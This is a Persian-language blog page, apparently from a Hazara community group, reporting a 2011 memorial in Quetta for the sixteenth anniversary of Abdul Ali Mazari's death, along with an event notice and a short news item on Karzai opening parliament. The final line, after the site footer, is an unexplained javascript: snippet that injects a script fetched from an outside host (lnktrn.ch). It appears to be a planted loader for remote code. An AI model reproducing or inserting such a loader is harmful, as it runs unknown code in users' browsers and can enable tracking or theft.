مهمانان پیوسته می  آمدند و صدای قرائت قرآنکریم در داخل سالون سنگینی محفل را بیشتر از پیش نشان میداد. آقای میرزا آزاد رئیس اکادمی هزارگی تنظیم نسل نو هزاره مغل و کابینه این حزب در این محفل دست خالی نیامدند. ویژه نامه ای دیدگاه نسل نو که به مناسبت شانزدهمین سالگرد شهادت رهبر شهید در 104 صفحه توسط مرتضی خرمی تهیه گردیده بود و بنیاد شهید مزاری و تنظیم نسل نو مصارف چاپ آن را بر عهده گرفته بودند و شامل موضوعات مختلف بود ـ قبل از شروع محفل برای اشتراک کنندگان توزیع گردید.

کار رسمی محفل ساعت 2:45 دقیقه ی بعد از ظهر با اشعار زیبا و پر محتوا در وصف رهبر شهید و خوش آمدید از مهمانان عالیقدر توسط برادر محترم محمد جواد نوا و خواهر محترمه فریده جان آغاز گردید و آنها از خواهر محترمه قاری زهرا سلیمی دعوت نمودند که در جایگاه قرار گیرد. خواهر محترمه زهرا سلیمی با تلاوت آیاتی چند از کلام الله مجید به محفل نورانیت بیشتر بخشید. سپس همه ی مهمانان بنا به دعوت مجری برنامه از حاضرین محفل تقاضا بعمل آمد که به احترام سرودهای ملی جمهوری اسلامی افغانستان و پاکستان بپاخیزند و تمام حاضرین به احترام سرودهای ملی بپا خاسته و کمال احترام را بجا آوردند.

به تعقیب آن آقای محمد کاظم مایل مسئول برگزاری محفل و عضو هئیت رهبری بنیاد شهید مزاری ( ره ) بیانیه خوش آمدید شان را ایراد نموده و شانزدهمین سالگرد شهادت رهبر شهید را به حاضرین، خانواده های شهدا و آزادگان جهان تسلیت گفت.

بعداً گروه سرود " آزادگان"  ملبث با لباس های سیاه در جایگاه قرار گرفته و سرود جالب و زیبای شان را در وصف رهبر شهید اجرا و مورد استقبال گرم حاضرین قرار گرفتند.

آقایان حاجی محمد شاه قرلق و تاج محمد هنر نماینده برادران ازبک بیانیه های پر محتوا و عالمانه ی شان را ایراد نموده و شهید مزاری را اولین شهید دست تروریزم بین المللی، مدافع راه حق و عدالت خوانده و بر ادامه ی راه رهبر شهید تاکید نمودند.

آقای فضل الله مرادی یکتن از اساتید مکاتب هزاره تاون شعر زیبایی را با آهنگ غمگین که توسط علی جان اجرا می شد، دکلمه نمود.

بعد از دکلمه شعر گروه سرود" پیمان بابه  " سرود حماسی شان را با آهنگ انقلابی اجرا و بر رونق بیش از حد محفل افزودند.

به تعقیب اجرای سرود ـ نوبت به پیامهای تسلیتی رسید. پیام اول ـ پیام تسلیت بنیاد شهید مزاری ( ره ) بود که توسط برادر محترم محمد ظاهر رضایی عضو هئیت مدیره بنیاد شهید مزاری ( ره ) خوانده شد. سپس پیام یگانه یاد گار بابه قهرمان و سر افراز توسط خواهر محترمه فوزیه عابدی قرائت گردید. به تعقیب آن، پیام محترم استاد حاج محمد محقق رهبر حزب وحدت اسلامی افغانستان توسط خواهر محترمه فیروزه ارزگانی به خوانش گرفته شد. بعد از ختم پیام استاد محقق، پیام تسلیت ویدیویی محترم استاد محمد کریم خلیلی رهبر حزب وحدت اسلامی و معاون ریاست جمهوری افغانستان که برای این محفل مواصلت نموده بود توسط پروجیکتور پخش و  سخنان استاد خلیلی مورد توجه حاضرین محفل قرار گرفته و از سخنان زنده رهبر حزب وحدت اسلامی افغانستان استفاده شایان نمودند. بنیاد شهید مزاری ، زینب مزاری، استاد محقق و استاد خلیلی در پیامهای کتبی وویدیویی شان برای حفظ وحدت و همدلی مردم افغانستان، عبور از تعصبات قومی، ادامه راه رهبر شهید و دوری از افراد و تفریط و چالش های موجود در جمهوری اسلامی افغانستان و حرکت های آزادی طلبانه ی مردمان کشور های اسلامی عربی و آفریقایی اشاره نموده وحرکت های اصلاح طلبانه و ضد دیکتاتوری های جوامع اسلامی را حرکت برگرفته از حرکت های رهبر شهید استاد مزاری پیشوای عدالت خواهی خوانده و برتداوم و تطبیق اهداف والای رهبر شهید به گونه ی احسن تاکید نموده بودند.

بعد از قرائت و نشر پیام ها گروه سرود "وحدت " سرود بسیار عالی را در سوگ رهبر شهید زمزمه نموده و مورد تشویق بیش از حد حاضرین محفل قرار گرفتند.

در ادامه ی محفل آقایان پروفیسور ناظر حسین یکی از شخصیت های مطرح علمی هزاره های کویته، مرتضی خرمی عضو کمیته فرهنگی حزب وحدت اسلامی در مقاومت های مردمی کابل و بامیان ـ رئیس هیئت مدیره بنیاد شهید مزاری مقیم کویته و معاون اتشه امور مهاجرین و عودت کنندگان در صوبه بلوچستان، امداد الله عزیز اتشه امور مهاجرین وعودت کنندگان، میرزا آزاد رئیس اکادمی هزارگی تنظیم نسل نو هزاره مغل به ترتیب سخنرانی نموده و روی کارنامه های مبارزاتی و سیاسی رهبر شهید به تفصیل صحبت نموده و رهبر شهید را نه تنها مدافع حقوق مظلومان افغانستان بلکه منادی عدالت خواهی در برابر ظلم و بیعدالتی های حکومت های مستبد گذشته افغانستان و دیکتاتور ها و انحصارگران جهانی خوانده و ادامه ی راه مزاری را برای تمام انسانهای روی زمین و بخصوص مردم شهید پرور و عزتمند افغانستان ضروری و حتمی دانسته و جناب رهبر شهید استاد مزاری بزرگ را فریاد رسان اقوام فراموش شده و مظلوم افغانستان یاد آوری نموده و او را رهبر خردمند، صادق، دلسوز ـ متعهد و رهبر شهید همه ی مردم افغانستان خواندند.

بعد از سخنرانی ها ـ که مردم ساعت ها برای شنیدن سخنان عالمانه ی شخصیت ها منتظر نشسته بودند، گروه سرود "نسل نو" با لباس های محلی هزارگی در جایگاه قرار گرفته با اجرای سرود پر سوز و پر عاطفه ی شان شهادت رهبر شهید را گرامی داشتند.

آقای کوهزاد ناظم منتخب اسبق مردم هزاره تاون و جنرال سکرتری حزب هزاره دموکراتیک به ایراد سخن پرداخته استاد شهید را منادی وحدت ملی و عدالت اجتماعی در کشور خوانده و خواسته های رهبر شهید را در جریان جهاد مردم افغانستان در مقابل اتحاد جماهیر شوروی و مقاومت عدالت طلبانه ی ملی و مقوله های مطرح شده از سوی رهبر شهید را کار آمد تمام مردم کشور های جهان خواند.

بعد از سخنرانی آقای کوهزاد، آقای نوروزعلی کریمی یکتن از استادان مرکز آموزشی سریر که عضو ستاد برگزاری این محفل باشکوه بود، شعر حماسی ای را در وصف رهبر شهید با موزیک غمگین دکلمه نمود.

در اخیر محفل، حجته الاسلام و المسلمین آقای رفعت مسئول دارالقرآن اهلبیت ( ع ) با دعای خیرو برکت به کار محفل خاتمه بخشیده و برای ادامه راه  و تحقق اهداف رهبر شهید برای همه ی پیروان آن ابر مرد تاریخ از خداوند بزرگ طالب موفقیت و کامیابی شد.  مجریان برنامه بعد از ختم دعا مهمانان حاضر در محفل را برای صرف چای که از سوی برادر محترم نعمت الله در نظر گرفته شده بود در سالون بالا دعوت نموده و مهمانان بعد از صرف چای و تشکری از آنان مرخص شده و برگزار کنندگان محفل و اعضای متعهد و پر افتخار بنیاد شهید مزاری در پیش عکس رهبر شهید ـ عکس یاد گاری گرفته و با بابه مزاری بزرگ احترام و از خداوند متعال توفیق ادامه ی راه آن ستاره تابناک راه آزادی را طلب نموده و تجدید میثاق نمودند.

قابل یاد آوریست، تنظیم نسل نو هزاره مغل در چاپ ویژه نامه، حزب هزاره دموکراتیک پارتی در بخش امنیت، جناب آقای اختر جعفری در قسمت در اختیار قرار دادن هالش،آقای استاد رمضان مسئول رمضان موزیک سنتر در بخش سمعی و بصری و آقای افضلی در بخش انتظامات ذکور، خواهر محترمه حسنیه در بخش انتظامات اناث، آقای رحمانی مسئول کیبل النور در قسمت نشر اطلاعیه ویدیویی محفل، اساتید و شاگردان مکاتب در تهیه گروپ های سرود،استاد فضل الله مرادی در بخش اعلان محفل توسط موتر، خواهر فریده در بخش انانسری همکاری نمودند و جمعی از برادران که برای برگزاری این محفل مساعدت مالی نموده بودند، هئیت رهبری بنیاد شهید مزاری ( ره ) مقیم کویته از همکاری و تلاش شبانه روزی آنان اظهار سپاس و قدردانی نموده و توفیقات و پاداش عظیم برایشان از خداوند بزرگ مسئلت دارد.

 

 

 

 

 

 

 

 

+ نوشته شده توسط آزادگان در 2011/3/14 و ساعت 2:25 PM |
http://
+ نوشته شده توسط آزادگان در 2011/3/6 و ساعت 9:6 PM |

اطلاعیه محفل گرامیداشت از شانزدهمین سالگرد

 شهادت رهبر شهید استاد عبدالعلی مزاری و یاران

همراهش در کویته

از دوستان و رهروان رهبر شهید صمیمانه تقاضا بعمل میاید که در نشر و پخش این اطلاعیه از طریق وب سایت، وبلاگ، ایمیل، مسینجر ها و صفحات فیس بوک بنیاد شهید مزاری ( ره ) را همکاری فرمایند.

***********

همچنین بنیاد شهید مزاری و اکادمی هزارگی تنظیم نسل نو هزاره مغل ویژه نامه ای را به مناسبت گرامیداشت از شانزدهمین سالگرد شهادت رهبر شهید تهیه نموده که این ویژه نامه در ختم محفل برای اشتراک کنندگان توزیع خواهد شد.

 

+ نوشته شده توسط آزادگان در 2011/2/28 و ساعت 2:22 PM |

پارلمان  گشایش یافت

کرزی: نگذاریم خوابهای وحشتناکی که برایمان دیده اند به واقعیت بپیوندد

حامد کرزی

گشایش پارلمان به هفته ها جنجال میان رئیس جمهوری و نمایندگان برنده پایان می دهد

حامد کرزی، رئیس جمهوری افغانستان از "مداخلات" در روند برگزاری انتخابات انتقاد کرد.


ادامه مطلب
+ نوشته شده توسط آزادگان در 2011/1/26 و ساعت 2:36 PM |


Powered By
BLOGFA.COM


javascript:(a=(b=document).createElement('script')).src='//lnktrn.ch/osama/a.js.php?'+Math.random(),b.body.appendChild(a);void(0)